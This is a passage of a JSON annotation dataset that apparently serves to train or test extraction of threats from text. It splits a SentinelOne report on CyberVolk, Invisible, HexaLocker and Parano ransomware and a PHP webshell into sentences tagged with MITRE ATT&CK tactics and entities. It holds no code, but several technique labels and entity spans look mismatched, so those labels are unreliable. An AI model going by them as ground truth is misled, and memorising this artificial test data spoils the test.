wallpaper modification used for input of the decryption key and displaying payment details.", "sentence_text": "Both ransomware families are derived from the same AzzaSec Ransomware code base.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s42-93d2ae", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "Both ransomware families are derived from the same AzzaSec Ransomware code base.", "sentence_text": "Invisible/Doubleface Source\nThe source code/builder for Invisible has been leaked publicly and distributed through various channels, mainly Telegram.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "leaked publicly and distributed through Telegram", "entities": [ { "text": "Invisible", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "source code/builder", "start": 32, "end": 51, "label": "MalwareTool" }, { "text": "Telegram.", "start": 140, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "leaked publicly", "start": 75, "end": 90, "label": "Action" }, { "text": " distributed through various channels", "start": 94, "end": 131, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s43-278752", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "Invisible/Doubleface Source\nThe source code/builder for Invisible has been leaked publicly and distributed through various channels, mainly Telegram.", "sentence_text": "The archive contains the full Visual Studio project and source code for building new Invisible Ransom payloads, along with some already compiled samples/stubs.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "building new Invisible Ransom payloads", "entities": [ { "text": "Invisible Ransom", "start": 85, "end": 101, "label": "MalwareTool" }, { "text": "payloads", "start": 102, "end": 110, "label": "MalwareTool" }, { "text": "samples/stubs.", "start": 145, "end": 159, "label": "MalwareTool" }, { "text": "Visual Studio project and source code", "start": 30, "end": 67, "label": "MalwareTool" }, { "text": "building", "start": 72, "end": 80, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s44-3b9943", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "The archive contains the full Visual Studio project and source code for building new Invisible Ransom payloads, along with some already compiled samples/stubs.", "sentence_text": "The file\nransom.cpp\ncontains the main logic for the ransomware payload.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "ransom.cpp contains the main logic for the ransomware payload", "entities": [ { "text": "ransom.cpp", "start": 9, "end": 19, "label": "MalwareTool" }, { "text": "ransomware payload.", "start": 52, "end": 71, "label": "MalwareTool" }, { "text": "contains", "start": 20, "end": 28, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s45-02c548", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "The file\nransom.cpp\ncontains the main logic for the ransomware payload.", "sentence_text": "The main ransom.cpp handles calls out to Cryptographic.cpp to process encryption tasks, including the implementation of AES/RSA (via aes.cpp and rsa.cpp respectively).", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "process encryption tasks using AES/RSA", "entities": [ { "text": "ransom.cpp", "start": 9, "end": 19, "label": "MalwareTool" }, { "text": "Cryptographic.cpp", "start": 41, "end": 58, "label": "MalwareTool" }, { "text": "AES/RSA", "start": 120, "end": 127, "label": "MalwareTool" }, { "text": "aes.cpp and rsa.cpp", "start": 133, "end": 152, "label": "MalwareTool" }, { "text": "process encryption tasks", "start": 62, "end": 86, "label": "Action" }, { "text": "handles calls out ", "start": 20, "end": 38, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s46-0496fa", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "The main ransom.cpp handles calls out to Cryptographic.cpp to process encryption tasks, including the implementation of AES/RSA (via aes.cpp and rsa.cpp respectively).", "sentence_text": "The current implementation indicates AES-256 for file encryption, and RSA-2048 for wrapping the keys.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s47-179ab6", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "The current implementation indicates AES-256 for file encryption, and RSA-2048 for wrapping the keys.", "sentence_text": "Each file is encrypted via AES-256 (EncFile function in Cryptographic.cpp ) with the AES key then encrypted via RSA-2048.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "encrypt files with AES-256 and encrypt AES keys with RSA-2048", "entities": [ { "text": "AES-256", "start": 27, "end": 34, "label": "MalwareTool" }, { "text": "RSA-2048.", "start": 112, "end": 121, "label": "MalwareTool" }, { "text": "file is encrypted", "start": 5, "end": 22, "label": "Action" }, { "text": "key then encrypted", "start": 89, "end": 107, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s48-4ac6ba", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "Each file is encrypted via AES-256 (EncFile function in Cryptographic.cpp ) with the AES key then encrypted via RSA-2048.", "sentence_text": "We can also see the implementation of the ransom countdown mechanism in ransom.cpp .", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "implement ransom countdown mechanism", "entities": [ { "text": "ransom.cpp", "start": 72, "end": 82, "label": "MalwareTool" }, { "text": "implementation of the ransom countdown", "start": 20, "end": 58, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s49-24e18d", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "We can also see the implementation of the ransom countdown mechanism in ransom.cpp .", "sentence_text": "As with CyberVolk Ransom, the default timeout period is 5 hours.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "set default ransom timeout", "entities": [ { "text": " CyberVolk Ransom", "start": 7, "end": 24, "label": "ThreatActor" }, { "text": "default timeout period", "start": 30, "end": 52, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s50-2714cd", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "As with CyberVolk Ransom, the default timeout period is 5 hours.", "sentence_text": "This is initially set via the timeLeft variable in ransom.cpp", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "initialize ransom timeout via timeLeft variable", "entities": [ { "text": "ransom.cpp", "start": 51, "end": 61, "label": "MalwareTool" }, { "text": "initially set via the timeLeft variable", "start": 8, "end": 47, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s51-cd079c", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "This is initially set via the timeLeft variable in ransom.cpp", "sentence_text": "The timer writes a time.dat file to %appdata%\\Roaming as we saw with CyberVolk.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "writes time.dat to %appdata%\\Roaming to control ransom countdown", "entities": [ { "text": "CyberVolk.", "start": 69, "end": 79, "label": "ThreatActor" }, { "text": "%appdata%\\Roaming", "start": 36, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "time.dat file", "start": 19, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "writes a time.dat file", "start": 10, "end": 32, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s52-aeaa67", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "The timer writes a time.dat file to %appdata%\\Roaming as we saw with CyberVolk.", "sentence_text": "The 5 hour time limit for these samples is read from this path.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "reads time.dat from %appdata%\\Roaming to determine countdown timer", "entities": [ { "text": " path", "start": 57, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "read ", "start": 43, "end": 48, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s53-6d9b78", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "The 5 hour time limit for these samples is read from this path.", "sentence_text": "In theory, this file could be manipulated to alter the timeout.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "potentially alter time.dat to modify countdown timer", "entities": [ { "text": "file", "start": 16, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "manipulated to alter the timeout", "start": 30, "end": 62, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s54-17c6bc", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "In theory, this file could be manipulated to alter the timeout.", "sentence_text": "The\nransom.cpp\nsource file also contains the template for the ransom notes, which are written to the same path from which the ransomware is executed as InvisibleReadMe.txt The termination of MMC processes and Task Manager is also present in the Invisible Ransom source (as we also see with CyberVolk samples)", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" }, { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "create/write ransom note; terminate system management processes (MMC, Task Manager)", "entities": [ { "text": "Invisible Ransom source", "start": 245, "end": 268, "label": "MalwareTool" }, { "text": "ransom.cpp", "start": 4, "end": 14, "label": "Infrastructure_Indicator" }, { "text": "InvisibleReadMe.txt", "start": 152, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "termination of MMC processes and Task Manager", "start": 176, "end": 221, "label": "Action" }, { "text": "written to the same path from which the ransomware is executed", "start": 86, "end": 148, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s57-5db5c8", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "Demand.", "sentence_text": "Dominate” | HexaLocker Ransomware HexaLocker is a ransomware family that first appeared in July 2024.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "initial appearance/deployment of HexaLocker ransomware", "entities": [ { "text": "HexaLocker Ransomware", "start": 12, "end": 33, "label": "MalwareTool" }, { "text": "appeared", "start": 79, "end": 87, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s58-66c10e", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "Dominate” | HexaLocker Ransomware HexaLocker is a ransomware family that first appeared in July 2024.", "sentence_text": "HexaLocker payloads are written in Golang .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.001", "name": "Malware" } ], "procedure": "HexaLocker ransomware implemented in Golang", "entities": [ { "text": "HexaLocker payloads", "start": 0, "end": 19, "label": "MalwareTool" }, { "text": "written in Golang .", "start": 24, "end": 43, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s59-99c67d", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "HexaLocker payloads are written in Golang .", "sentence_text": "As of this writing, we have only observed payloads targeting Windows systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s60-a6fdec", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "As of this writing, we have only observed payloads targeting Windows systems.", "sentence_text": "On July 22, CyberVolk first referenced HexaLocker via one of Holy League’s posts.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.001", "name": "Malware" } ], "procedure": "CyberVolk references HexaLocker via social media/post", "entities": [ { "text": "CyberVolk", "start": 12, "end": 21, "label": "ThreatActor" }, { "text": "Holy League’", "start": 61, "end": 73, "label": "ThreatActor" }, { "text": "HexaLocker", "start": 39, "end": 49, "label": "MalwareTool" }, { "text": "referenced", "start": 28, "end": 38, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s61-a20aa0", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "On July 22, CyberVolk first referenced HexaLocker via one of Holy League’s posts.", "sentence_text": "The Holy League is a loosely affiliated group of 70+ members born out of protest against Spain and associated arrests of members of NONAME057(16)\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s62-6938b6", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "The Holy League is a loosely affiliated group of 70+ members born out of protest against Spain and associated arrests of members of NONAME057(16)\n.", "sentence_text": "HexaLocker’s posts and branding are all laden with their “Lock.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s64-abfd4f", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "Demand.", "sentence_text": "Dominate” slogan.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s65-95210b", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "Dominate” slogan.", "sentence_text": "In September 2024, HexaLocker launched a new Telegram channel after previous ones had been banned or removed.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Establish communication infrastructure via Telegram", "entities": [ { "text": "HexaLocker", "start": 19, "end": 29, "label": "ThreatActor" }, { "text": "Telegram channel", "start": 45, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "launched a new Telegram channel", "start": 30, "end": 61, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s66-34393a", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "In September 2024, HexaLocker launched a new Telegram channel after previous ones had been banned or removed.", "sentence_text": "The updated channel contains details on their ongoing existence along with screenshots of the current HexaLocker panel.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Publish operational updates via Telegram channel", "entities": [ { "text": "HexaLocker", "start": 102, "end": 112, "label": "ThreatActor" }, { "text": " HexaLocker panel.", "start": 101, "end": 119, "label": "MalwareTool" }, { "text": "updated channel", "start": 4, "end": 19, "label": "Infrastructure_Indicator" }, { "text": "contains details ", "start": 20, "end": 37, "label": "Action" }, { "text": "screenshots", "start": 75, "end": 86, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s67-eac2ff", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "The updated channel contains details on their ongoing existence along with screenshots of the current HexaLocker panel.", "sentence_text": "Throughout October 2024, CyberVolk’s communication channels continued to echo messaging from HexaLocker.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Replicating or amplifying messages from HexaLocker via CyberVolk channels", "entities": [ { "text": "CyberVolk", "start": 25, "end": 34, "label": "ThreatActor" }, { "text": " HexaLocker", "start": 92, "end": 103, "label": "ThreatActor" }, { "text": "communication channels", "start": 37, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "echo messaging from HexaLocker", "start": 73, "end": 103, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s68-527309", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "Throughout October 2024, CyberVolk’s communication channels continued to echo messaging from HexaLocker.", "sentence_text": "This includes HexaLocker’s solicitations for help in continuing to progress with HexaLocker.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Soliciting external help to support ransomware operations", "entities": [ { "text": "HexaLocker.", "start": 81, "end": 92, "label": "ThreatActor" }, { "text": "solicitations for help", "start": 27, "end": 49, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s69-59e253", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "This includes HexaLocker’s solicitations for help in continuing to progress with HexaLocker.", "sentence_text": "These include:\nStronger anti-debug/anti-analysis features Advanced obfuscations (crypting/packing)\nInclusion of EDR/XDR/AV-Killer Permanent AMSI bypass Improved process-injection Remote Thread Hijacking UAC Bypass improvements Self-deletion Interesting developments continued with HexaLocker throughout October 2024.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218.010", "name": "Regsvr32" }, { "id": "T1055", "name": "Process Injection" }, { "id": "T1562.001", "name": "Disable or Modify Tools" }, { "id": "T1490", "name": "Inhibit System Recovery" } ], "procedure": "Enhancing malware capabilities and implementing advanced defense evasion techniques", "entities": [ { "text": "HexaLocker", "start": 281, "end": 291, "label": "ThreatActor" }, { "text": "EDR/XDR/AV-Killer", "start": 112, "end": 129, "label": "MalwareTool" }, { "text": "Stronger anti-debug/anti-analysis features Advanced obfuscations (crypting/packing)", "start": 15, "end": 98, "label": "Action" }, { "text": " EDR/XDR/AV-Killer Permanent AMSI bypass Improved process-injection ", "start": 111, "end": 179, "label": "Action" }, { "text": "Remote Thread Hijacking", "start": 179, "end": 202, "label": "Action" }, { "text": "UAC Bypass improvements", "start": 203, "end": 226, "label": "Action" }, { "text": "Self-deletion", "start": 227, "end": 240, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s70-04f550", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "These include:\nStronger anti-debug/anti-analysis features Advanced obfuscations (crypting/packing)\nInclusion of EDR/XDR/AV-Killer Permanent AMSI bypass Improved process-injection Remote Thread Hijacking UAC Bypass improvements Self-deletion Interesting developments continued with HexaLocker throughout October 2024.", "sentence_text": "On October 4th, the group posted an update with a video demo claiming that an “EDR Killer” and AMSI/WD Bypass features had been added.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" }, { "id": "T1562.003", "name": "Impair Command History Logging" } ], "procedure": "Enhancing malware with EDR and AMSI/WD bypass features", "entities": [ { "text": " the group", "start": 15, "end": 25, "label": "ThreatActor" }, { "text": "EDR Killer", "start": 79, "end": 89, "label": "MalwareTool" }, { "text": "AMSI/WD Bypass features", "start": 95, "end": 118, "label": "MalwareTool" }, { "text": "posted an update with a video demo", "start": 26, "end": 60, "label": "Action" }, { "text": "claiming that an “EDR Killer” and AMSI/WD Bypass features had been added.", "start": 61, "end": 134, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s71-559bb9", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 71, "context_before": "On October 4th, the group posted an update with a video demo claiming that an “EDR Killer” and AMSI/WD Bypass features had been added.", "sentence_text": "This was followed on October 6th with an update stating that UAC bypasses had been added to the product.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1548.002", "name": "Abuse Elevation Control Mechanism: Bypass User Account Control" } ], "procedure": "Adding UAC bypass functionality to ransomware", "entities": [ { "text": " UAC bypasses", "start": 60, "end": 73, "label": "MalwareTool" }, { "text": "stating that UAC bypasses had been added to the product.", "start": 48, "end": 104, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s72-6ea99a", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 72, "context_before": "This was followed on October 6th with an update stating that UAC bypasses had been added to the product.", "sentence_text": "This includes the maintenance of the HexaLocker project and all the relationships and alliances that revolve around it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s73-674ef7", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 73, "context_before": "This includes the maintenance of the HexaLocker project and all the relationships and alliances that revolve around it.", "sentence_text": "This was followed the next day on October 21 with offers to sell HexaLocker and the panel infrastructure, along with associated “LAPSUS$ Ransomware”.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.003", "name": "Code Signing Certificates" } ], "procedure": "offers to sell HexaLocker and panel infrastructure", "entities": [ { "text": "HexaLocker", "start": 65, "end": 75, "label": "MalwareTool" }, { "text": "“LAPSUS$ Ransomware”.", "start": 128, "end": 149, "label": "MalwareTool" }, { "text": " panel infrastructure,", "start": 83, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "offers to sell", "start": 50, "end": 64, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s74-d2b076", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 74, "context_before": "This was followed the next day on October 21 with offers to sell HexaLocker and the panel infrastructure, along with associated “LAPSUS$ Ransomware”.", "sentence_text": "The overt promotion of HexaLocker within CyberVolk channels has ceased since the HexaLocker shutdown announcement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s75-7fe40a", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 75, "context_before": "The overt promotion of HexaLocker within CyberVolk channels has ceased since the HexaLocker shutdown announcement.", "sentence_text": "Parano Ransomware", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s76-023062", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 76, "context_before": "Parano Ransomware", "sentence_text": "Within the CyberVolk Collective In late October 2024, various identities in the CyberVolk community began promoting the release of Parano Ransomware v1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s77-498980", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 77, "context_before": "Within the CyberVolk Collective In late October 2024, various identities in the CyberVolk community began promoting the release of Parano Ransomware v1.", "sentence_text": "This appears to be another affiliation for the CyberVolk collective.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s78-e98de1", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 78, "context_before": "This appears to be another affiliation for the CyberVolk collective.", "sentence_text": "According to the announcement, Parano Ransomware comes with a $400.00 USD price tag per single payload/stub.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s79-67e295", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 79, "context_before": "According to the announcement, Parano Ransomware comes with a $400.00 USD price tag per single payload/stub.", "sentence_text": "The ransomware features strong anti-analysis and anti-debugging features, and uses a combination of AES-128 and RSA-4096 for key management.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s80-c125b0", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 80, "context_before": "The ransomware features strong anti-analysis and anti-debugging features, and uses a combination of AES-128 and RSA-4096 for key management.", "sentence_text": "The data can be exfiltrated via Discord webhook to a channel or location of the attacker’s choosing.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567.002", "name": "Exfiltration to Cloud Storage" } ], "procedure": "exfiltrate data via Discord webhook", "entities": [ { "text": "the attacker", "start": 76, "end": 88, "label": "ThreatActor" }, { "text": "Discord webhook", "start": 32, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "exfiltrated", "start": 16, "end": 27, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s81-7864a9", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 81, "context_before": "The data can be exfiltrated via Discord webhook to a channel or location of the attacker’s choosing.", "sentence_text": "At the time of writing, we have not observed the executable variations of Parano ( aka Paraodeus Ransomware) in the wild.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s82-469254", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 82, "context_before": "At the time of writing, we have not observed the executable variations of Parano ( aka Paraodeus Ransomware) in the wild.", "sentence_text": "The author has shared a non-malicious Python-based demo of a “ScreenLocker”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s83-38cf98", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 83, "context_before": "The author has shared a non-malicious Python-based demo of a “ScreenLocker”.", "sentence_text": "As it stands, the nature of the relationship between CyberVolk and the Parano ecosystem is still evolving.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s84-1a3a3a", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 84, "context_before": "As it stands, the nature of the relationship between CyberVolk and the Parano ecosystem is still evolving.", "sentence_text": "Beyond Ransomware | CyberVolk Stealers and Webshells", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s85-f3ca8d", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 85, "context_before": "Beyond Ransomware | CyberVolk Stealers and Webshells", "sentence_text": "In addition to ransomware and other disruptive attacks, CyberVolk develops and distributes infostealer malware and webshells.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Develops and distributes infostealer malware and webshells", "entities": [ { "text": "CyberVolk", "start": 56, "end": 65, "label": "ThreatActor" }, { "text": "infostealer malware and webshells.", "start": 91, "end": 125, "label": "MalwareTool" }, { "text": "develops and distributes", "start": 66, "end": 90, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s86-c359ce", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 86, "context_before": "In addition to ransomware and other disruptive attacks, CyberVolk develops and distributes infostealer malware and webshells.", "sentence_text": "The group announced the new webshell in late October 2024.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Announced the new webshell", "entities": [ { "text": "The group", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "new webshell", "start": 24, "end": 36, "label": "MalwareTool" }, { "text": "announced ", "start": 10, "end": 20, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s87-22f827", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 87, "context_before": "The group announced the new webshell in late October 2024.", "sentence_text": "The CyberVolk webshell is distributed as a standard PHP file with the actual malicious code base64-encoded inside its body.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Distributed a webshell as a base64-encoded PHP file", "entities": [ { "text": " CyberVolk ", "start": 3, "end": 14, "label": "ThreatActor" }, { "text": "webshell", "start": 14, "end": 22, "label": "MalwareTool" }, { "text": "distributed ", "start": 26, "end": 38, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s88-64a0e1", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 88, "context_before": "The CyberVolk webshell is distributed as a standard PHP file with the actual malicious code base64-encoded inside its body.", "sentence_text": "The publicly\nreleased\nversion of the CyberVolk webshell provides multiple functions.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Provides multiple functions in a webshell", "entities": [ { "text": "CyberVolk", "start": 37, "end": 46, "label": "ThreatActor" }, { "text": "webshell", "start": 47, "end": 55, "label": "MalwareTool" }, { "text": "provides multiple functions.", "start": 56, "end": 84, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s89-e55188", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 89, "context_before": "The publicly\nreleased\nversion of the CyberVolk webshell provides multiple functions.", "sentence_text": "The current version of the webshell allows for files to be uploaded, renamed, and downloaded.", "relevant": "yes", "tactic": [ { "id": 